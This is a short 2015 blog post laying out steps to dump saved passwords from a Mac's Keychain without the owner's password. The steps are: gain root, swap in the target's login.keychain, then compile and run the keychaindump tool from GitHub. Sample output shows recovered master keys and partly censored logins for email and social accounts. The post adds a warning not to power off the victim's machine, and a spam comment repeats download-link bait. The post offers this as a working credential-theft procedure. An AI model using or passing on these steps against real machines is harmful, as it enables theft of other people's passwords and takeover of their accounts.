Thursday 4 June 2015

Apple: Retrieve Passwords from Keychain without User's Password


The following steps allow you to retrieve the passwords from the Keychain without user's password in Mac OS X:
1.  Sign in to root account.
2.  Copy the login.keychain file in /Users/administrator/Library/Keychains
3.  Backup the login.keychain file in /private/var/root/Library/Keychains
4.  Replace the login.keychain file in /private/var/root/Library/Keychains with the login.keychain file you obtain from Part 2.
5.  Get the keychaindump.c from https://raw.githubusercontent.com/juuso/keychaindump/master/keychaindump.c
6.  Open Terminal and go to the directory where you have kept the keychaindump.c file.
7.  Type in the following command lines:
$ gcc keychaindump.c -o keychaindump -lcrypto
$ sudo ./keychaindump

* Note:
a.  The user’s MacBook cannot be restarted or powered off!
b.  During the execution of the command lines, you might be asked to install the Xcode application.

Example with truncated and censored output:
$ sudo ./keychaindump
[*] Searching process 15 heap range 0x7fa809400000-0x7fa809500000
[*] Searching process 15 heap range 0x7fa809500000-0x7fa809600000
[*] Searching process 15 heap range 0x7fa809600000-0x7fa809700000
[*] Searching process 15 heap range 0x7fa80a900000-0x7fa80ac00000
[*] Found 17 master key candidates
[*] Trying to decrypt wrapping key in /Users/juusosalonen/Library/Keychains/login.keychain
[*] Trying master key candidate: b49ad51a672bd4be55a4eb4efdb90b242a5f262ba80a95df
[*] Trying master key candidate: 22b8aa80fa0700605f53994940fcfe9acc44eb1f4587f1ac
[*] Trying master key candidate: 1d7aa80fa0700f002005043210074b877579996d09b70000
[*] Trying master key candidate: 88edbaf22819a8eeb8e9b75120c0775de8a4d7da842d4a4a
[+] Found master key: 88edbaf22819a8eeb8e9b75120c0775de8a4d7da842d4a4a
[+] Found wrapping key: e9acc39947f1996df940fceb1f458ac74b877579f54409b7
xxxxxxx:192.168.1.1:xxxxxxx
xxxxxxx@gmail.com:login.facebook.com:xxxxxxx
xxxxxxx@gmail.com:smtp.google.com:xxxxxxx
xxxxxxx@gmail.com:imap.google.com:xxxxxxx
xxxxxxx:twitter.com:xxxxxxx
xxxxxxx@gmail.com:www.google.com:xxxxxxx
xxxxxxx:imap.gmail.com:xxxxxxx
...
Posted by at

1 comment:

  1. Anonymous18 April 2022 at 00:25

    Andres Cheah: Apple: Retrieve Passwords From Keychain Without User'S Password >>>>> Download Now

    >>>>> Download Full

    Andres Cheah: Apple: Retrieve Passwords From Keychain Without User'S Password >>>>> Download LINK

    >>>>> Download Now

    Andres Cheah: Apple: Retrieve Passwords From Keychain Without User'S Password >>>>> Download Full

    >>>>> Download LINK qI

    ReplyDelete

Subscribe to: Post Comments (Atom)